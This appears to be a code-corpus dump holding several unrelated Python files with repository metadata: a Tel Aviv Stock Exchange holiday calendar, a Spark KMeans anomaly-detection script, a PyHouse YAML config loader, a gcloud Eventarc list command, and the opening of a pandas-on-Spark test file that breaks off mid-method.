    Timestamp('2019-10-21', tz='Asia/Jerusalem'),
    # 2020
    Timestamp('2020-03-02', tz='Asia/Jerusalem'),
    Timestamp('2020-03-10', tz='Asia/Jerusalem'),
    Timestamp('2020-04-08', tz='Asia/Jerusalem'),
    Timestamp('2020-04-09', tz='Asia/Jerusalem'),
    Timestamp('2020-04-14', tz='Asia/Jerusalem'),
    Timestamp('2020-04-15', tz='Asia/Jerusalem'),
    Timestamp('2020-04-28', tz='Asia/Jerusalem'),
    Timestamp('2020-04-29', tz='Asia/Jerusalem'),
    Timestamp('2020-05-28', tz='Asia/Jerusalem'),
    Timestamp('2020-05-29', tz='Asia/Jerusalem'),
    Timestamp('2020-07-30', tz='Asia/Jerusalem'),
    Timestamp('2020-09-20', tz='Asia/Jerusalem'),
    Timestamp('2020-09-27', tz='Asia/Jerusalem'),
    Timestamp('2020-09-28', tz='Asia/Jerusalem'),
    # 2021
    Timestamp('2021-02-26', tz='Asia/Jerusalem'),
    Timestamp('2021-03-28', tz='Asia/Jerusalem'),
    Timestamp('2021-04-02', tz='Asia/Jerusalem'),
    Timestamp('2021-04-14', tz='Asia/Jerusalem'),
    Timestamp('2021-04-15', tz='Asia/Jerusalem'),
    Timestamp('2021-05-16', tz='Asia/Jerusalem'),
    Timestamp('2021-05-17', tz='Asia/Jerusalem'),
    Timestamp('2021-07-18', tz='Asia/Jerusalem'),
    Timestamp('2021-09-06', tz='Asia/Jerusalem'),
    Timestamp('2021-09-07', tz='Asia/Jerusalem'),
    Timestamp('2021-09-08', tz='Asia/Jerusalem'),
    Timestamp('2021-09-15', tz='Asia/Jerusalem'),
    Timestamp('2021-09-16', tz='Asia/Jerusalem'),
    Timestamp('2021-09-20', tz='Asia/Jerusalem'),
    Timestamp('2021-09-21', tz='Asia/Jerusalem'),
    Timestamp('2021-09-27', tz='Asia/Jerusalem'),
    Timestamp('2021-09-28', tz='Asia/Jerusalem'),
]
class TASEExchangeCalendar(MarketCalendar):
    """
    Exchange calendar for TASE Stock Exchange
    Note these dates are only checked against 2020 and 2021
    https://info.tase.co.il/Eng/about_tase/corporate/Pages/vacation_schedule.aspx
    Opening times for the regular trading of equities (not including closing auction call)
    Open Time: 10:00 AM Asia/Jerusalem
    Close Time: 3:59 PM Asia/Jerusalem
    Daylight Saving Time in Israel comes into effect on the Friday before the last Sunday in March, and lasts until the last Sunday in October.
    During the Daylight Saving time period the clock will be UTC+3, and for the rest of the year UTC+2.
    Regularly-Observed Holidays (not necessarily in order):
    - Purim
    - Passover_I_Eve
    - Passover_I
    - Passover_II_Eve
    - Passover_II
    - Independence_Day
    - Yom_HaZikaron
    - Shavuot_Eve
    - Shavuot
    - Tisha_beAv
    - Jewish_New_Year_Eve
    - Jewish_New_Year_I
    - Jewish_New_Year_II
    - Yom_Kippur_Eve
    - Yom_Kippur
    - Sukkoth_Eve
    - Sukkoth
    - Simchat_Tora_Eve
    - Simchat_Tora
    """
    aliases = ['TASE']
    @property
    def name(self):
        """Exchange name used by pandas_market_calendars."""
        return "TASE"
    @property
    def tz(self):
        """Native timezone of the exchange."""
        return timezone("Asia/Jerusalem")
    @property
    def open_time_default(self):
        """Default market open: 10:00 local time."""
        return time(10, 0, tzinfo=self.tz)
    @property
    def close_time_default(self):
        """Default market close: 15:59 local time."""
        return time(15, 59, tzinfo=self.tz)
    @property
    def adhoc_holidays(self):
        """Dates on which the exchange was closed (see TASEClosedDay)."""
        return TASEClosedDay
    @property
    def weekmask(self):
        """Trading week runs Sunday through Thursday."""
        return "Sun Mon Tue Wed Thu"
| 35.349593 | 144 | 0.640524 | from datetime import time
from pandas import Timestamp
from pytz import timezone
from pandas_market_calendars import MarketCalendar
# Ad-hoc TASE closures (holiday dates), as tz-aware midnight timestamps.
TASEClosedDay = [
    # 2019
    Timestamp('2019-03-21', tz='Asia/Jerusalem'),
    Timestamp('2019-04-09', tz='Asia/Jerusalem'),
    Timestamp('2019-04-25', tz='Asia/Jerusalem'),
    Timestamp('2019-04-26', tz='Asia/Jerusalem'),
    Timestamp('2019-05-08', tz='Asia/Jerusalem'),
    Timestamp('2019-05-09', tz='Asia/Jerusalem'),
    Timestamp('2019-06-09', tz='Asia/Jerusalem'),
    Timestamp('2019-08-11', tz='Asia/Jerusalem'),
    Timestamp('2019-09-17', tz='Asia/Jerusalem'),
    Timestamp('2019-09-29', tz='Asia/Jerusalem'),
    Timestamp('2019-09-30', tz='Asia/Jerusalem'),
    Timestamp('2019-10-01', tz='Asia/Jerusalem'),
    Timestamp('2019-10-08', tz='Asia/Jerusalem'),
    Timestamp('2019-10-09', tz='Asia/Jerusalem'),
    Timestamp('2019-10-13', tz='Asia/Jerusalem'),
    Timestamp('2019-10-14', tz='Asia/Jerusalem'),
    Timestamp('2019-10-20', tz='Asia/Jerusalem'),
    Timestamp('2019-10-21', tz='Asia/Jerusalem'),
    # 2020
    Timestamp('2020-03-02', tz='Asia/Jerusalem'),
    Timestamp('2020-03-10', tz='Asia/Jerusalem'),
    Timestamp('2020-04-08', tz='Asia/Jerusalem'),
    Timestamp('2020-04-09', tz='Asia/Jerusalem'),
    Timestamp('2020-04-14', tz='Asia/Jerusalem'),
    Timestamp('2020-04-15', tz='Asia/Jerusalem'),
    Timestamp('2020-04-28', tz='Asia/Jerusalem'),
    Timestamp('2020-04-29', tz='Asia/Jerusalem'),
    Timestamp('2020-05-28', tz='Asia/Jerusalem'),
    Timestamp('2020-05-29', tz='Asia/Jerusalem'),
    Timestamp('2020-07-30', tz='Asia/Jerusalem'),
    Timestamp('2020-09-20', tz='Asia/Jerusalem'),
    Timestamp('2020-09-27', tz='Asia/Jerusalem'),
    Timestamp('2020-09-28', tz='Asia/Jerusalem'),
    # 2021
    Timestamp('2021-02-26', tz='Asia/Jerusalem'),
    Timestamp('2021-03-28', tz='Asia/Jerusalem'),
    Timestamp('2021-04-02', tz='Asia/Jerusalem'),
    Timestamp('2021-04-14', tz='Asia/Jerusalem'),
    Timestamp('2021-04-15', tz='Asia/Jerusalem'),
    Timestamp('2021-05-16', tz='Asia/Jerusalem'),
    Timestamp('2021-05-17', tz='Asia/Jerusalem'),
    Timestamp('2021-07-18', tz='Asia/Jerusalem'),
    Timestamp('2021-09-06', tz='Asia/Jerusalem'),
    Timestamp('2021-09-07', tz='Asia/Jerusalem'),
    Timestamp('2021-09-08', tz='Asia/Jerusalem'),
    Timestamp('2021-09-15', tz='Asia/Jerusalem'),
    Timestamp('2021-09-16', tz='Asia/Jerusalem'),
    Timestamp('2021-09-20', tz='Asia/Jerusalem'),
    Timestamp('2021-09-21', tz='Asia/Jerusalem'),
    Timestamp('2021-09-27', tz='Asia/Jerusalem'),
    Timestamp('2021-09-28', tz='Asia/Jerusalem'),
]
class TASEExchangeCalendar(MarketCalendar):
    """Trading calendar for the Tel Aviv Stock Exchange (TASE).

    Regular equity session runs 10:00-15:59 Asia/Jerusalem, Sunday through
    Thursday, with ad-hoc holiday closures listed in ``TASEClosedDay``.
    """

    aliases = ['TASE']

    @property
    def name(self):
        """Exchange name."""
        return "TASE"

    @property
    def tz(self):
        """Native timezone of the exchange."""
        return timezone("Asia/Jerusalem")

    @property
    def open_time_default(self):
        """Default market open: 10:00 local time."""
        return time(hour=10, minute=0, tzinfo=self.tz)

    @property
    def close_time_default(self):
        """Default market close: 15:59 local time."""
        return time(hour=15, minute=59, tzinfo=self.tz)

    @property
    def adhoc_holidays(self):
        """Dates on which the exchange was closed ad hoc."""
        return TASEClosedDay

    @property
    def weekmask(self):
        """Trading week runs Sunday through Thursday."""
        return "Sun Mon Tue Wed Thu"
| true | true |
f7fa3cd349f1ac8a1d4f4540a2bee092f29ec831 | 4,793 | py | Python | sample_ml_code/kmeansandey.py | aws-samples/automation-ml-step-data-pipeline | 835e6e746fd932b32f1a186006adc257778eeec6 | [
"MIT-0"
] | 6 | 2020-10-27T09:07:36.000Z | 2021-12-27T00:25:19.000Z | sample_ml_code/kmeansandey.py | aws-samples/automation-ml-step-data-pipeline | 835e6e746fd932b32f1a186006adc257778eeec6 | [
"MIT-0"
] | null | null | null | sample_ml_code/kmeansandey.py | aws-samples/automation-ml-step-data-pipeline | 835e6e746fd932b32f1a186006adc257778eeec6 | [
"MIT-0"
] | 8 | 2020-10-13T22:23:16.000Z | 2022-02-15T21:29:37.000Z | #!/usr/bin/env python
"""
Anomaly detection, where anomalies are "too far" from one of k cluster centers.
Calculate cluster centers for k clusters (where k is an input).
Then: for each observation in the input file, assign it to the closest cluster
and calculate the Mahalanobis distance from that point to the cluster center.
Output the original observation, plus the additional calculated columns:
assigned_cluster, cluster center, distance
The input (CSV) is expected to be a database extract. Each input row consists of
several columns of identifying information for this obs (cols 0 : first),
followed by several columns of actual observation (cols first : last).
This approach allows anomalies to be traced back to the source data if necessary.
Tested with 3 columns of observational variables.
Uses Spark / Mllib.
Inputs:
infile csv format file, 1 row per observation
k number of clusters to use
outfile directory to place output files in
Output:
CSV file input file + calculated columns
Requires:
pyspark, pyspark.mllib
scipy.spatial
numpy
"""
import sys
import numpy as np
from pyspark import SparkContext, SparkConf
from pyspark.mllib.clustering import KMeans
import scipy.spatial.distance as sci # for Mahalanobis distance calc
# if running pyspark / spark-submit, 'sc' is automatically defined
# sc = SparkContext(appName="KMeans E.G.")
conf = SparkConf().setAppName("KMeans E.G.")
sc = SparkContext(conf=conf)
"""
Dictionary 'incols' relates infile's columns to the data extracted.
Columns [count starts from 0]:
select: highway, sensorstation, sensorid,
yearday, dow, timeofday, volume, speed, occupancy
"""
# Map of input-CSV column names to their 0-based positions (see module docstring).
incols = {'highway' : 0, 'sensorstation': 1, 'sensorid': 2, 'dayofyear': 3, 'dow': 4, 'time': 5, 'vol': 6, 'spd': 7, 'occ': 8 }
sensorset = incols['sensorid']  # column holding the sensor id
dow = incols['dow']             # day-of-week column
# Columns we want to cluster on are: fst:lst
fst = incols['vol']
lst = incols['occ'] + 1
# pt_pred_arr appends the cluster index right after the original 9 columns,
# so the appended cluster id lands at index `lst`.
clstrcol = lst # the column for the cluster center TO FIX
idstr = ''
def parse_vector(line):
    """Parse one comma-separated record into a 1-D float ndarray."""
    fields = line.split(',')
    return np.array([float(field) for field in fields])
def pt_pred_arr(point):
    """Append the assigned cluster index and that cluster's center to *point*.

    Uses the module-level ``clusters`` model and the ``fst``/``lst`` column
    bounds.  Rows whose observation columns are all zero are left unassigned:
    they get cluster index -1 and an all-zero "center".
    """
    # e.g.: clusters.predict([1,0,1])
    cntr = -1
    pt = point[fst:lst]
    cntrpt = np.zeros_like(pt) # Create "null" array: if there's no center
    if np.count_nonzero(pt) > 0:
        cntr = clusters.predict(point[fst:lst])
        cntrpt = clusters.centers[cntr]
    return np.r_[point, [cntr], cntrpt]
if __name__ == "__main__":
    # Driver: cluster the observations, then score every row by Mahalanobis
    # distance from its assigned cluster center.
    if len(sys.argv) != 4:
        sys.stderr.write("Usage: kmeansande.py <infile> <k> <outfile>\n")
        exit(-1)
    infilenm = sys.argv[1]   # input file name (in s3)
    k = int(sys.argv[2])     # number of clusters to use
    outfilenm = sys.argv[3]
    # Read the main data file
    lines = sc.textFile(infilenm)
    alldata = lines.map(parse_vector)
    # Only run kmeans on columns fst:lst; drop all-zero observation rows.
    datasub = alldata.map(lambda arr: np.array(arr[fst:lst])) \
                     .filter(lambda x: np.count_nonzero(x) > 0)
    clusters = KMeans.train(datasub, k)
    # For each point: find the closest cluster center and append the cluster
    # index plus that center's coordinates to the original row.
    closestcenter = alldata.map(lambda cc: pt_pred_arr(cc))
    # Mahalanobis distance needs each cluster's inverted covariance matrix.
    inv_covmat = []
    for c in range(0, k):
        # Get the actual data columns (subset of the whole line)
        data = closestcenter.filter(lambda arr: np.array(arr[clstrcol]) == c) \
                            .map(lambda arr: np.array(arr[fst:lst]))
        # Collect to a local list so numpy stats can run against it.
        datacol = data.collect()
        dtcnt = len(datacol)
        if dtcnt == 0:
            print("Error? - No data for cluster #" + str(c) + ".\n")
            # BUG FIX: this line was the bare name `iterate`, which raised a
            # NameError at runtime.  Skip the empty cluster, appending an
            # identity placeholder so inv_covmat[c] stays aligned with the
            # cluster indices used below.
            inv_covmat.append(np.eye(lst - fst))
            continue
        covmat = np.cov(datacol, None, 0)         # covariance matrix
        inv_covmat.append(np.linalg.inv(covmat))  # inverted
    # Calc the Mahalanobis distance for each point and append to row.
    # NOTE(review): all-zero rows carry cluster index -1, which indexes the
    # *last* center/matrix here -- confirm that is intended.
    dists = closestcenter.map(lambda dst:
                              ','.join(['%.2f' % num for num in
                                        (np.r_[dst, sci.mahalanobis(dst[fst:lst],
                                                                    clusters.centers[int(dst[clstrcol])],
                                                                    inv_covmat[int(dst[clstrcol])])])]))
    dists.saveAsTextFile(outfilenm)  # output resulting file
    sc.stop()
| 39.61157 | 127 | 0.66305 |
"""
Anomaly detection, where anomalies are "too far" from one of k cluster centers.
Calculate cluster centers for k clusters (where k is an input).
Then: for each observation in the input file, assign it to the closest cluster
and calculate the Mahalanobis distance from that point to the cluster center.
Output the original observation, plus the additional calculated columns:
assigned_cluster, cluster center, distance
The input (CSV) is expected to be a database extract. Each input row consists of
several columns of identifying information for this obs (cols 0 : first),
followed by several columns of actual observation (cols first : last).
This approach allows anomalies to be traced back to the source data if necessary.
Tested with 3 columns of observational variables.
Uses Spark / Mllib.
Inputs:
infile csv format file, 1 row per observation
k number of clusters to use
outfile directory to place output files in
Output:
CSV file input file + calculated columns
Requires:
pyspark, pyspark.mllib
scipy.spatial
numpy
"""
import sys
import numpy as np
from pyspark import SparkContext, SparkConf
from pyspark.mllib.clustering import KMeans
import scipy.spatial.distance as sci
conf = SparkConf().setAppName("KMeans E.G.")
sc = SparkContext(conf=conf)
"""
Dictionary 'incols' relates infile's columns to the data extracted.
Columns [count starts from 0]:
select: highway, sensorstation, sensorid,
yearday, dow, timeofday, volume, speed, occupancy
"""
incols = {'highway' : 0, 'sensorstation': 1, 'sensorid': 2, 'dayofyear': 3, 'dow': 4, 'time': 5, 'vol': 6, 'spd': 7, 'occ': 8 }
sensorset = incols['sensorid']
dow = incols['dow']
# Columns we want to cluster on are: fst:lst
fst = incols['vol']
lst = incols['occ'] + 1
clstrcol = lst # the column for the cluster center TO FIX
idstr = ''
def parse_vector(line):
    """Convert one CSV record into a numpy vector of floats."""
    tokens = line.split(',')
    values = [float(tok) for tok in tokens]
    return np.array(values)
def pt_pred_arr(point):
    """Append the assigned cluster index and that cluster's center to *point*.

    Uses the module-level ``clusters`` model and ``fst``/``lst`` bounds.
    All-zero observation rows stay unassigned (index -1, zero "center").
    """
    # e.g.: clusters.predict([1,0,1])
    cntr = -1
    pt = point[fst:lst]
    cntrpt = np.zeros_like(pt) # Create "null" array: if there's no center
    if np.count_nonzero(pt) > 0:
        cntr = clusters.predict(point[fst:lst])
        cntrpt = clusters.centers[cntr]
    return np.r_[point, [cntr], cntrpt]
if __name__ == "__main__":
    # Driver: cluster the observations, then score every row by Mahalanobis
    # distance from its assigned cluster center.
    if len(sys.argv) != 4:
        sys.stderr.write("Usage: kmeansande.py <infile> <k> <outfile>\n")
        exit(-1)
    infilenm = sys.argv[1]   # input file name (in s3)
    k = int(sys.argv[2])     # number of clusters to use
    outfilenm = sys.argv[3]
    lines = sc.textFile(infilenm)
    alldata = lines.map(parse_vector)
    # Only run kmeans on columns fst:lst; drop all-zero observation rows.
    datasub = alldata.map(lambda arr: np.array(arr[fst:lst])) \
                     .filter(lambda x: np.count_nonzero(x) > 0)
    clusters = KMeans.train(datasub, k)
    closestcenter = alldata.map(lambda cc: pt_pred_arr(cc))
    # Mahalanobis distance needs each cluster's inverted covariance matrix.
    inv_covmat = []
    for c in range(0, k):
        data = closestcenter.filter(lambda arr: np.array(arr[clstrcol]) == c) \
                            .map(lambda arr: np.array(arr[fst:lst]))
        datacol = data.collect()
        dtcnt = len(datacol)
        if dtcnt == 0:
            print("Error? - No data for cluster #" + str(c) + ".\n")
            # BUG FIX: this line was the bare name `iterate` (a NameError).
            # Skip the empty cluster; append an identity placeholder so
            # inv_covmat[c] stays aligned with cluster indices used below.
            inv_covmat.append(np.eye(lst - fst))
            continue
        covmat = np.cov(datacol, None, 0)
        inv_covmat.append(np.linalg.inv(covmat))
    # Calc the Mahalanobis distance for each point and append to row.
    dists = closestcenter.map(lambda dst:
                              ','.join(['%.2f' % num for num in
                                        (np.r_[dst, sci.mahalanobis(dst[fst:lst],
                                                                    clusters.centers[int(dst[clstrcol])],
                                                                    inv_covmat[int(dst[clstrcol])])])]))
    dists.saveAsTextFile(outfilenm)
    sc.stop()
| false | true |
f7fa3d230e37b5992cf1b5209c6bf723230cb81d | 1,018 | py | Python | src/Install/private.py | DBrianKimmel/PyHouse_Install | 9c7ff397299e0f2e63782d4a955d2f8bf840ef6f | [
"MIT"
] | 1 | 2015-10-13T15:01:48.000Z | 2015-10-13T15:01:48.000Z | src/Install/private.py | DBrianKimmel/PyHouse_Install | 9c7ff397299e0f2e63782d4a955d2f8bf840ef6f | [
"MIT"
] | null | null | null | src/Install/private.py | DBrianKimmel/PyHouse_Install | 9c7ff397299e0f2e63782d4a955d2f8bf840ef6f | [
"MIT"
] | null | null | null | """
@name: PyHouse_Install/src/Install/private.py
@author: D. Brian Kimmel
@contact: D.BrianKimmel@gmail.com
@copyright: (c) 2016-2016 by D. Brian Kimmel
@license: MIT License
@note: Created May 13, 2016
@Summary: Create .private
Create the /etc/pyhouse/.private.yaml file that will hold the secret information used by the pyhouse system.
HOSTNAME: hostname
MQTT: true
NODE_RED: false
"""
import yaml
Y_FILE = '/etc/pyhouse/.private.yaml'
class Private(object):
    """Container for the secret configuration of this PyHouse node."""

    def __init__(self):
        self.hostname = None  # not yet loaded
class API(object):
    """Load (and optionally re-dump) the private YAML configuration.

    ``read_yaml`` is called on construction, so instantiating this class
    reads Y_FILE immediately.
    """

    def __init__(self):
        self.m_private = Private()
        self.read_yaml()

    def read_yaml(self):
        """Read Y_FILE; ``m_private`` is replaced by the parsed YAML content."""
        # use safe_load instead of load: it refuses arbitrary object tags.
        # 'with' guarantees the handle is closed even if parsing raises
        # (the previous explicit close() was skipped on error).
        with open(Y_FILE) as l_file:
            self.m_private = yaml.safe_load(l_file)

    def write_yaml(self):
        """Dump the current private data to 'newtree.yaml' (not back to Y_FILE)."""
        with open('newtree.yaml', "w") as l_file:
            yaml.dump(self.m_private, l_file)
# BUG FIX: the guard read '__main--', which can never equal __name__,
# so API() was never invoked when running this module as a script.
if __name__ == '__main__':
    API()

# ## END DBK
| 19.207547 | 108 | 0.633595 |
import yaml
Y_FILE = '/etc/pyhouse/.private.yaml'
class Private(object):
    """Record holding the secret settings for this PyHouse node."""

    def __init__(self):
        # Starts empty; populated from the private YAML file elsewhere.
        self.hostname = None
class API(object):
    """Load (and optionally re-dump) the private YAML configuration."""

    def __init__(self):
        self.m_private = Private()
        self.read_yaml()

    def read_yaml(self):
        """Read Y_FILE; ``m_private`` is replaced by the parsed YAML content."""
        # safe_load refuses arbitrary object construction from untrusted YAML.
        # 'with' closes the handle even if parsing raises (the previous
        # explicit close() was skipped on error).
        with open(Y_FILE) as l_file:
            self.m_private = yaml.safe_load(l_file)

    def write_yaml(self):
        """Dump the current private data to 'newtree.yaml' (not back to Y_FILE)."""
        with open('newtree.yaml', "w") as l_file:
            yaml.dump(self.m_private, l_file)
# BUG FIX: the guard read '__main--', which can never equal __name__.
if __name__ == '__main__':
    API()
| true | true |
f7fa3ddc6f0ec4da6918d148a7a91e09eb47a328 | 2,000 | py | Python | lib/surface/eventarc/channel_connections/list.py | google-cloud-sdk-unofficial/google-cloud-sdk | 2a48a04df14be46c8745050f98768e30474a1aac | [
"Apache-2.0"
] | 2 | 2019-11-10T09:17:07.000Z | 2019-12-18T13:44:08.000Z | lib/surface/eventarc/channel_connections/list.py | google-cloud-sdk-unofficial/google-cloud-sdk | 2a48a04df14be46c8745050f98768e30474a1aac | [
"Apache-2.0"
] | null | null | null | lib/surface/eventarc/channel_connections/list.py | google-cloud-sdk-unofficial/google-cloud-sdk | 2a48a04df14be46c8745050f98768e30474a1aac | [
"Apache-2.0"
] | 1 | 2020-07-25T01:40:19.000Z | 2020-07-25T01:40:19.000Z | # -*- coding: utf-8 -*- #
# Copyright 2021 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Command to list all channel connections in a project and location."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.api_lib.eventarc import channel_connections
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.eventarc import flags
_DETAILED_HELP = {
"DESCRIPTION":
"{description}",
"EXAMPLES":
"""\
To list all channel connections in location ``us-central1'', run:
$ {command} --location=us-central1
""",
}
_FORMAT = """\
table(
name.scope("channelConnections"):label=NAME,
channel:label=CHANNEL
)
"""
@base.Hidden
@base.ReleaseTracks(base.ReleaseTrack.GA)
class List(base.ListCommand):
  """List Eventarc channel connections."""

  detailed_help = _DETAILED_HELP

  @staticmethod
  def Args(parser):
    """Registers the command's flags and display configuration on `parser`."""
    flags.AddLocationResourceArg(
        parser,
        "Location for which to list channel connections. This should be one of the supported regions.",
        required=True)
    display_info = parser.display_info
    display_info.AddFormat(_FORMAT)
    display_info.AddUriFunc(channel_connections.GetChannelConnectionsURI)

  def Run(self, args):
    """Lists the channel connections in the location parsed from `args`."""
    connection_client = channel_connections.ChannelConnectionClientV1()
    parsed_location = args.CONCEPTS.location.Parse()
    return connection_client.List(parsed_location, args.limit, args.page_size)
| 31.25 | 103 | 0.7375 |
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.api_lib.eventarc import channel_connections
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.eventarc import flags
_DETAILED_HELP = {
"DESCRIPTION":
"{description}",
"EXAMPLES":
"""\
To list all channel connections in location ``us-central1'', run:
$ {command} --location=us-central1
""",
}
_FORMAT = """\
table(
name.scope("channelConnections"):label=NAME,
channel:label=CHANNEL
)
"""
@base.Hidden
@base.ReleaseTracks(base.ReleaseTrack.GA)
class List(base.ListCommand):
detailed_help = _DETAILED_HELP
@staticmethod
def Args(parser):
flags.AddLocationResourceArg(
parser,
"Location for which to list channel connections. This should be one of the supported regions.",
required=True)
parser.display_info.AddFormat(_FORMAT)
parser.display_info.AddUriFunc(channel_connections.GetChannelConnectionsURI)
def Run(self, args):
client = channel_connections.ChannelConnectionClientV1()
location_ref = args.CONCEPTS.location.Parse()
return client.List(location_ref, args.limit, args.page_size)
| true | true |
f7fa3e113624a8b4cb37438fb0d9c9ef30af3f3b | 72 | py | Python | omb/backend/__init__.py | lhqing/omb | 3476a6c377dbac621e6328004d6fd73f7b7c4fbb | [
"MIT"
] | 4 | 2020-08-28T01:00:09.000Z | 2022-03-25T23:00:47.000Z | omb/backend/__init__.py | lhqing/omb | 3476a6c377dbac621e6328004d6fd73f7b7c4fbb | [
"MIT"
] | 2 | 2020-11-08T23:55:08.000Z | 2020-12-24T06:05:17.000Z | omb/backend/__init__.py | lhqing/omb | 3476a6c377dbac621e6328004d6fd73f7b7c4fbb | [
"MIT"
] | null | null | null | from .Dataset import Dataset
from .ingest import *
dataset = Dataset()
| 14.4 | 28 | 0.75 | from .Dataset import Dataset
from .ingest import *
dataset = Dataset()
| true | true |
f7fa3e876f5f1fdd3fd9a03bbcae2a10d57ea60b | 76,636 | py | Python | python/pyspark/pandas/tests/test_ops_on_diff_frames.py | geosmart/spark | 9c5bcac61ee56fbb271e890cc33f9a983612c5b0 | [
"BSD-2-Clause",
"Apache-2.0",
"CC0-1.0",
"MIT",
"MIT-0",
"ECL-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 1 | 2016-06-03T07:29:48.000Z | 2016-06-03T07:29:48.000Z | python/pyspark/pandas/tests/test_ops_on_diff_frames.py | geosmart/spark | 9c5bcac61ee56fbb271e890cc33f9a983612c5b0 | [
"BSD-2-Clause",
"Apache-2.0",
"CC0-1.0",
"MIT",
"MIT-0",
"ECL-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null | python/pyspark/pandas/tests/test_ops_on_diff_frames.py | geosmart/spark | 9c5bcac61ee56fbb271e890cc33f9a983612c5b0 | [
"BSD-2-Clause",
"Apache-2.0",
"CC0-1.0",
"MIT",
"MIT-0",
"ECL-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 1 | 2016-03-31T11:26:36.000Z | 2016-03-31T11:26:36.000Z | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from distutils.version import LooseVersion
from itertools import product
import unittest
import pandas as pd
import numpy as np
from pyspark import pandas as ps
from pyspark.pandas.config import set_option, reset_option
from pyspark.pandas.frame import DataFrame
from pyspark.testing.pandasutils import PandasOnSparkTestCase
from pyspark.testing.sqlutils import SQLTestUtils
from pyspark.pandas.typedef.typehints import (
extension_dtypes,
extension_dtypes_available,
extension_float_dtypes_available,
extension_object_dtypes_available,
)
class OpsOnDiffFramesEnabledTest(PandasOnSparkTestCase, SQLTestUtils):
    @classmethod
    def setUpClass(cls):
        """Enable ops between frames/series anchored to different DataFrames for all tests."""
        super().setUpClass()
        set_option("compute.ops_on_diff_frames", True)
    @classmethod
    def tearDownClass(cls):
        """Restore the default `compute.ops_on_diff_frames` setting."""
        reset_option("compute.ops_on_diff_frames")
        super().tearDownClass()
@property
def pdf1(self):
return pd.DataFrame(
{"a": [1, 2, 3, 4, 5, 6, 7, 8, 9], "b": [4, 5, 6, 3, 2, 1, 0, 0, 0]},
index=[0, 1, 3, 5, 6, 8, 9, 10, 11],
)
@property
def pdf2(self):
return pd.DataFrame(
{"a": [9, 8, 7, 6, 5, 4, 3, 2, 1], "b": [0, 0, 0, 4, 5, 6, 1, 2, 3]},
index=list(range(9)),
)
@property
def pdf3(self):
return pd.DataFrame(
{"b": [1, 1, 1, 1, 1, 1, 1, 1, 1], "c": [1, 1, 1, 1, 1, 1, 1, 1, 1]},
index=list(range(9)),
)
@property
def pdf4(self):
return pd.DataFrame(
{"e": [2, 2, 2, 2, 2, 2, 2, 2, 2], "f": [2, 2, 2, 2, 2, 2, 2, 2, 2]},
index=list(range(9)),
)
@property
def pdf5(self):
return pd.DataFrame(
{
"a": [1, 2, 3, 4, 5, 6, 7, 8, 9],
"b": [4, 5, 6, 3, 2, 1, 0, 0, 0],
"c": [4, 5, 6, 3, 2, 1, 0, 0, 0],
},
index=[0, 1, 3, 5, 6, 8, 9, 10, 11],
).set_index(["a", "b"])
@property
def pdf6(self):
return pd.DataFrame(
{
"a": [9, 8, 7, 6, 5, 4, 3, 2, 1],
"b": [0, 0, 0, 4, 5, 6, 1, 2, 3],
"c": [9, 8, 7, 6, 5, 4, 3, 2, 1],
"e": [4, 5, 6, 3, 2, 1, 0, 0, 0],
},
index=list(range(9)),
).set_index(["a", "b"])
@property
def pser1(self):
midx = pd.MultiIndex(
[["lama", "cow", "falcon", "koala"], ["speed", "weight", "length", "power"]],
[[0, 3, 1, 1, 1, 2, 2, 2], [0, 2, 0, 3, 2, 0, 1, 3]],
)
return pd.Series([45, 200, 1.2, 30, 250, 1.5, 320, 1], index=midx)
@property
def pser2(self):
midx = pd.MultiIndex(
[["lama", "cow", "falcon"], ["speed", "weight", "length"]],
[[0, 0, 0, 1, 1, 1, 2, 2, 2], [0, 1, 2, 0, 1, 2, 0, 1, 2]],
)
return pd.Series([-45, 200, -1.2, 30, -250, 1.5, 320, 1, -0.3], index=midx)
@property
def pser3(self):
midx = pd.MultiIndex(
[["koalas", "cow", "falcon"], ["speed", "weight", "length"]],
[[0, 0, 0, 1, 1, 1, 2, 2, 2], [1, 1, 2, 0, 0, 2, 2, 2, 1]],
)
return pd.Series([45, 200, 1.2, 30, 250, 1.5, 320, 1, 0.3], index=midx)
    @property
    def psdf1(self):
        """pandas-on-Spark counterpart of `pdf1`."""
        return ps.from_pandas(self.pdf1)
    @property
    def psdf2(self):
        """pandas-on-Spark counterpart of `pdf2`."""
        return ps.from_pandas(self.pdf2)
    @property
    def psdf3(self):
        """pandas-on-Spark counterpart of `pdf3`."""
        return ps.from_pandas(self.pdf3)
    @property
    def psdf4(self):
        """pandas-on-Spark counterpart of `pdf4`."""
        return ps.from_pandas(self.pdf4)
    @property
    def psdf5(self):
        """pandas-on-Spark counterpart of `pdf5`."""
        return ps.from_pandas(self.pdf5)
    @property
    def psdf6(self):
        """pandas-on-Spark counterpart of `pdf6`."""
        return ps.from_pandas(self.pdf6)
    @property
    def psser1(self):
        """pandas-on-Spark counterpart of `pser1`."""
        return ps.from_pandas(self.pser1)
    @property
    def psser2(self):
        """pandas-on-Spark counterpart of `pser2`."""
        return ps.from_pandas(self.pser2)
    @property
    def psser3(self):
        """pandas-on-Spark counterpart of `pser3`."""
        return ps.from_pandas(self.pser3)
    def test_ranges(self):
        """Adding two separately created `ps.range` frames matches element-wise addition."""
